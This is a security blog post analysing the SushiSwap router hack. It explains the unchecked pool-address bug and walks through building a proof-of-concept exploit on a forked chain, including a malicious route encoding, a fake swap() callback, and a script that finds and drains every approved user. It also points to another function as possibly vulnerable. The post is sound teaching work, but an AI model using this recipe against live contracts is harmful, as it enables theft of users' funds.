Eating 4 Day Old Sushi - Replicating the SushiSwap Hack
Millions of dollars are commonly lost on DeFi hacks. In any other industry, this would mean lawsuits and jail time. In DeFi, as shown by Rekt leaderboard of hacks, this is just another day.
The most recent victim was a days-old contract: a Router from the Automated Market Maker (AMM) SushiSwap. A whitehat partially saved the funds of one user, but this triggered the MEV bots and blackhats to swoop in to clear everything else out. How was this done? In this article, we will dive into the vulnerability and write a full proof of concept exploit for the security issue. Included in this post is a demo environment to tinker around with the exploit code and understand this deeper. If you want to watch this in a video form, go watch the livestream with OpenSense.
Before diving into the technical details, some context is required. My goal is to provide everything needed to understand this vulnerability with links to dive deeper, but some basic programming knowledge and some familiarity with Solidity (addresses, msg.sender, tokens, etc.) will help understand the bug in full. Have fun!
High Level Issue
Figure 1: Simplified Vulnerable Code
The Sushiswap vulnerability is complicated when looking at the system as a whole. So, above in Figure 1, is a super simple version of the exploitable contract like you would find in a CTF.
The smart contract takes in an address as the parameter in func1(). The call sets the pool variable to be the user provided address parameter. In a different function, func2(), restricts access to the code based on the pool parameter.
Since a malicious user controls the pool parameter from the previous call, an attacker can bypass the restriction to perform sensitive operations. In this case, an attacker stole funds from other users. And that's basically it! You now have a high level understanding of the bug! After the general background section, we'll get into the nitty-gritty details of how this works.
AMMs + SushiSwap
Market Markers are the entities that make a market possible. The firm or individual actively quotes prices for buying an asset or selling an asset in a given market. In traditional finance, a combination of computer algorithms and people orchestrate this process.
What if we wanted to get rid of the people behind it? The land of Decentralized Finance (DeFi) literally has Decentralized in the name. This is where Automated Market Makers (AMM) come into play. An AMM is a market maker that is fully algorithmic (automated). Using an algorithm for a market maker allows a single operation to trade assets instead of two steps (put asset for trade and purchase asset). Additionally, instead of buying/selling stocks like in traditional finance, a user can buy and sell cryptocurrency assets.
SushiSwap is a popular AMM with some other functionality, such as lending products. Other similar platforms are Uniswap and Balancer. Unfortunately, SushiSwap has a history of vulnerabilities in their code. The first vulnerability was a small oversight in the calculations between buying assets and liquidating them that allowed for an attacker to steal funds. The second group was a serious set of voting vulnerabilities that allowed for sybil (multiple identity) and vote overcounting attacks.
Ethereum is built with Ether as the currency of the platform. Generally speaking, we need a way to represent general assets as well. This could be a representation of a loan, investments in a product, or something else. In order to represent this data and make it transferable, the ERC-20 standard was created. Although it just looks like a specification for a token on top of Ethereum, they are used for much more than a representation of money.
The ERC-20 standard has various fields and functions, such as the name of the token. The relevant methods for this article are listed below:
transfer(target_address, amount): Send amount of ERC-20 token to target_address. NOTE: Transfers from the caller (msg.sender) of the function.
approve(target_address, amount): Allow target_address to spend amount of the calling users funds. Misused approval is what this vulnerability exploits.
transferFrom(from_address, target_address, amount): Send amount of the ERC-20 token to target_address on behalf of the user from_address. An address must be allowed to do this via the approve function.
Vulnerability - Bad Input Validation
The Path of Least Resistance
According to SlowMist, the vulnerable code exists in the UniswapV3 functionality. Additionally, the mentioned entrypoint function was processRoute(). Using this knowledge, we can start from the UniswapV3 code and trace our way back up to an external call. Tracing the code is trivial to do with Cntrl+F over and over again. The call graph from processRoute() to swapUniV3 is as follows:
processRoute() takes in a few parameters including the token being traded, the amount to be traded and the expected token out. However, we only care about the slightly more complicated route parameter, which will be referred to as stream for most of the code snippets below.
The SushiSwap router has a bunch of functionality for performing trades. It allows for simple trades, sending traded funds to various pools, sending it to Uniswap... Instead of having all of these be a special parameter for the function, they encoded this information in the single parameter stream. Depending on the functionality being used inside the contract, the information is encoded differently for this variable. In the source code in Figure 1, the contract takes a route and turns this into a stream. From the source code at line 6, we can see that the variable commandCode is taking the first byte out of the route for the code path to follow. But, how do we get to the vulnerable code?
In order to save screen space, I am going to go through this fast but will include links to relevant source code. To use the processOnePool functionality, we need to specify a commandCode of 4, as shown in Figure 2. Then, processOnePool calls swap() unconditionally. Within swap, we need to specify the poolType as 1 in order to hit UniswapV3. Now, we are in UniswapV3 trading function.
UniswapV3 Functionality Vulnerability
Figure 3: UniswapV3 Handler Code
In Figure 3 above, we have the code for the UniswapV3 function. First at lines 4-6, it is reading in more information from the stream. In particular, it is reading in the pool address to use for Uniswap at line 4 and the address to send the funds to at line 6. Finally, it calls the Uniswap pool in order to trade our input token for our intended output token at line 9. What's the lastCalledPool = pool code on line 8 in Figure 3 doing? Remember this variable for the next section :)
A popular sink to look for in smart contracts for security issues are unverified external contract calls. This is where our security vulnerability lies! The pool address is never verified to be a proper UniswapV3 pool in this entire flow. In this case, it's not just ANY call: there is inherit trust in this functionality. If we can exploit this trust, we may be able pwn this contract.
Figure 4: UniswapV3 Callback Function
Uniswap requires a callback to transfer funds from the calling contract. This is a design decision to never require an approve() call on the contract itself. After the call to the UniswapV3 pool, this function in Figure 4 will be triggered to transfer funds to Uniswap. This callback function is highly trusted functionality within the application. What’s the callback function do in this case?
First, this code does validation that the msg.sender (address making the call) is the same as the previously called pool on line 6 of Figure 4. From Figure 3, this is the reason that lastCalledPool = pool is set. We want to perform access control on the callback uniswapV3SwapCallback! The lastCalledPool variable is verified to be the external UniswapV3 pool (Figure 3) to ensure this cannot be abused. If anybody could call this function, then all users who approved the contract could have had they funds taken. After this on line 8, the contract decodes the parameters tokenIn and from. Finally, the ERC-20 token is transferred from one account to another using transferFrom() on line 15.
If we look at the code a little harder and remember our background on ERC-20, the transferFrom() function is sending funds on behalf of another user. Prior to executing processRoute(), the caller of the contract is expected to have called approve() for the token to allow the SushiSwap router to spend funds on the callers behalf. The transfer must happen in the UniswapV3 callback, since we would have approved the router to transfer funds and not the UniswapV3 pool.
Bringing the Knowledge Together
From the previous two sections, we know two things:
The pool address is controlled via the stream parameter without any verification on a UniswapV3 call.
uniswapV3SwapCallback() allows the Uniswap pool called to transfer funds on behalf of the router for an arbitrary user.
Putting this all together, there's a horrible exploit to steal user funds:
An attacker can provide their own malicious contract as the pool address.
swap() will be called on the malicious pool address that is provided.
Since the uniswapV3SwapCallback() function allows for the in progress pool to call this function, the malicious contract can call transferFrom() on any user that has approved the router contract. tldr; stolen funds!
Crafting an Exploit
Woah. We now see there is a vulnerability in the code above that can steal user funds. Any user who has called approve() for the router can have all of their approved funds stolen. This is because we can call transferFrom() with an arbitrary user from the context of the contract. So, let's write a proof of concept exploiting this bug with the knowledge discussed above.
In order to run this exploit, we will need an environment to test this in. Clearly, testing this on mainnet Ethereum is a bad idea. I've setup a test environment to perform this attack on Github. The setup uses Hardhat as the development framework. We will fork the chain directly (found in the hardhat.config.js file) from a point prior to the hack. While running this fork, we have almost infinite money we can play around with as well.
In the real exploit, real user funds were taken. In our case, it is easier to fake this by creating a user and adding the approvals to the router contract. In order to do this, we will need a second smart contract that will get the funds for a token and make an approval for these tokens to the SushiSwap router. I chose USDC for the token of choice to exploit. To get the funds, an exchange (Uniswap) can be used to programmatically get USDC for ETH with functions like swapExactTokensForETH. This is out of the scope for this article but the demo has a working example.
Crafting a Fake Route
Malicious Route Setup
With our fake victim configured, we can now write our exploit payload. In order to do this, we will craft a fake stream that will trigger a call to a smart contract that we control. How is the route encoded? From before, we know this is encoded using the ABI to put the data into bytes.
In the section The Path of Least Resistance above, we traced the code in order to find the proper values to use. If you follow the code path, the stream (shown as route in many cases), uses 6 values:
CommandCode: To use the processOnePool command code, set this uint8 to 4.
TokenIn: The token being used as the initial trade. This is an address (20 bytes). We don't care about the value.
PoolCode: To use the swapUniV3 command code, set this uint8 to 1.
Pool Address: The smart contract being used for exploitation. This should implement the swap() function, which will be discussed later.
zeroForOne: A uint8 value that stores a boolean. Don't care about the value of this.
Recipient Address: An address for the receiver of funds from Uniswap. Since it's not really calling Uniswap, we don't care about this value, as long as it's an address.
Now that we know all of the values, let's encode it! Initially, I thought to encode this using the abi.encode() function. However, the exploit failed because it couldn't find the pool. Why? There are two abi (application binary interface) encoding functions: abi.encode() and abi.encodePacked(). First, abi.encode() puts every non-dynamic data type into 32 bytes, regardless of its size. Second, abi.encodePacked() will represent every data type with the fewest bytes possible. For instance, uint8 will take up a single byte. Upon looking into the library for parsing the stream it was apparent that abi.encodePacked() should be used because it was not incrementing in groups of 32 bytes; it was incrementing by the size of the type.
With this, we know how to build the route stream for the exploit! The rest of the parameters on the call require a valid ERC-20 token for the addresses but they are not relevant to the exploit. Besides this, nothing else matters. The code for this is shown above in Figure 5.
Hitting the Callback Function
Calling the Uniswap Callback
The Pool address from the route is the contract. So, we need to implement swap() in our attacker contract in order to hijack the control flow. For simplicity, I wrote a smart contract to call processRoute() then added swap() to this contract as well.
Once swap() has been called, we may execute the function uniswapV3SwapCallback() and steal the users funds. This is only because lastCalledPool is now set to our contract. This function requires three parameters:
amount0Delta: The amount of token 0 that was sent.
amount1Delta: The amount of token 1 that was sent.
data: Information for the request. This is abi encoded and breaks down into two elements:
tokenIn: The ERC-20 token address to steal from. Victim token address goes here.
from: The address/user in which to take the tokens from. Victim user address goes here.
In practice, we only need to provide a large positive value for amount0Delta. If we do this, then this parameter acts as the amount of funds to transfer. Since we want to steal the maximum amount of funds, we will set this to be the highest possible value for a given victim. This value depends on the amount of funds they have available and the amount they approved the router to spend.
The from parameter within the callback data should be our victim who we want to steal the funds from. The tokenIn should be the address of the token we're trying to take from the user. For this example, I've set up USDC. The code for this entire function call is shown above in Figure 6.
Poof Goes the Money
All we have to do is deploy the contract, call our attacker function and steal the money from the user. The full exploit code can be found mdulin2/sushi_swap_expliot_2023. Game over!
Figure 7: Exploit Video PoC
While writing this blog post, I was asked by mis4nthr0pic to give a talk within the OpenSense discord channel. So, I decided to talk about this vulnerability but with a slight twist: exploit all users that were vulnerable. Now, this exploit is exactly the same as before except that we cannot hardcode users or tokens; we need to do this dynamically. A link to this talk can be found HERE once it is put on YouTube.
To find the exploitable users, I wrote up a script that uses a combination of Etherscan and ETH-RPC. Here is how this was done:
Parse all of the transfer events from the previous request. In particular, log the users address in the from parameter and the token being traded.
Find the amount that can be stolen. This is the smaller of the approved funds the router can spend (allowance) and the balance in the wallet. This is done via making calling directly to the ERC20 tokens to check.
Steal the funds! Run the exploit for every user address discovered above.
There may have been other users who approved the router. However, I found searching for previous executions of the contract to be the easiest way to find exploitable users. The code for this can be found here. For a full PoC video of finding all the users and exploiting them, go here.
Initially, this vulnerability was found by the respected security auditor Trust. They contacted SushiSwap through Immunefi, who only said they were working on it, as HYDN had already detected this issue. User funds are at risk though!? Afraid that a blackhat could exploit this at any moment, Trust performed a whitehat hack in order to recover the funds of the user with the most funds at risk. As soon as this happened, a trove of MEV bots swooped in and stole the rest of the funds. Yikes! The dark forest is real. HYDN did manage to recover a large amount of funds though.
Trust was hit with some serious backslash after this. Why? When this initially happened, two tweets were made: I whitehat hacked 0xsifu and MEV bots stole the rest of it. Without the context of talking to SushiSwap, this looked pretty bad. Under these sorts of conditions, what would you have done?
If you wait too long to write the perfect POC, then somebody else may have stolen the money. If you do nothing, then the funds will likely be stolen. Additionally, the contract was not upgradeable and didn't have a pause functionality either. To me, there is no right answer here. Trust was only trying to help by securing user funds. Although SushiSwap wrote buggy (and unlikely unaudited) code, writing secure code is really difficult to do. Please get audits on all code getting released. In the future, some standards/guidance on when a whitehat hack is acceptable would be beneficial for everyone to avoid these types of situations in the future. Thanks for all you do Trust!
Please go through the proof of concept locally and debug this exploit. The best way to get better at hacking is to simply hack over and over again. If you're really up for a challenge, I believe that the swapTridentCL function suffers from the same vulnerability as the Uniswap implementation did. This would be an awesome exercise to implement this exploit yourself (it should be noted that I never tried exploiting this though. Just looks like the same pattern to me)! Overall, I thought this was a relatively simple vulnerability that helped me learn more about the DeFi ecosystem. I, as a lot of people, am still learning all about this.
Thanks for joining me in my understanding of the most recent SushiSwap hack. I hope you found this interesting and learned from the DeFi security discussions. Thanks to Trust for finding the bug, SlowMist for publishing the first sane tweet on the issue and both Nathan Peercy and Nathan Kirkland for reviewing this article. Feel free to reach out to me (contact information is in the footer) if you have any questions or comments about this article or anything else. Cheers from Maxwell "ꓘ" Dulin.